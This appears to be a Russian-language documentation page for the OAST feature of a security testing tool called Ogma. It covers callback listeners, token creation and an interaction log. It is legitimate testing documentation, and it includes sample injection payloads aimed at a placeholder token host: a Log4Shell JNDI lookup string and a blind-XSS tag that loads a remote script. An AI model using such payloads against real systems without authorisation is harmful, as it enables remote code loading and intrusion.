Перейти к содержимому

OAST ​

OAST (Out-of-Band Application Security Testing) обнаруживает уязвимости без видимого ответа: вместо него цель устанавливает исходящее соединение с контролируемым вами слушателем, подтверждая проблему.

Как это работает ​

Ogma запускает локальные слушатели нескольких протоколов. Когда целевое приложение обращается к ним, взаимодействие записывается с исходным IP, временем, полученными данными и внедрённым токеном.

Протоколы слушателей ​

ПротоколПорт по умолчаниюПрименение
HTTPНастраиваетсяSSRF, слепой XSS, вебхуки
HTTPSНастраиваетсяSSRF через TLS
DNSНастраиваетсяСлепая инъекция, XXE, log4shell
SMTPНастраиваетсяИнъекция почтовых заголовков, SSRF к почтовым сервисам

Настройте порты слушателей и доменное имя токенов в панели настроек OAST.

Создание токена обратного обращения ​

  1. Откройте Утилиты > OAST.
  2. Нажмите Создать токен. Каждый токен уникален для теста.
  3. Скопируйте токен. Он содержит домен слушателя и уникальный идентификатор для сопоставления обращений с тестом.

Пример формата: [unique-id].[your-oast-domain]

Использование токенов в тестовых данных ​

Вставляйте токен в любое поле, которое может вызвать исходящее соединение приложения:

  • SSRF — используйте HTTP/HTTPS-токен как целевой URL: https://[token]/
  • XXE — укажите токен в DOCTYPE или URL внешней сущности.
  • Log4Shell — вставьте в заголовок: ${jndi:ldap://[token]/a}
  • Слепой XSS — вставьте как src скрипта: <script src="https://[token]/x.js"></script>
  • Инъекция SMTP — используйте как адрес назначения или URL в почтовых заголовках.

Журнал взаимодействий ​

Панель показывает каждое полученное обратное обращение:

СтолбецОписание
ВремяКогда получено взаимодействие
ПротоколHTTP, HTTPS, DNS или SMTP
Исходный IPАдрес, установивший соединение
ТокенТокен, к которому обратились
ДанныеПуть запроса, имя DNS-запроса или данные SMTP

Нажмите строку для полных сведений, включая заголовки и тело запроса, где применимо.

Сопоставление взаимодействий с тестами ​

Уникальность токенов позволяет вставлять разные токены в разные параметры или запросы и точно определять точку внедрения, вызвавшую обращение.

Проприетарное ПО. Все права защищены.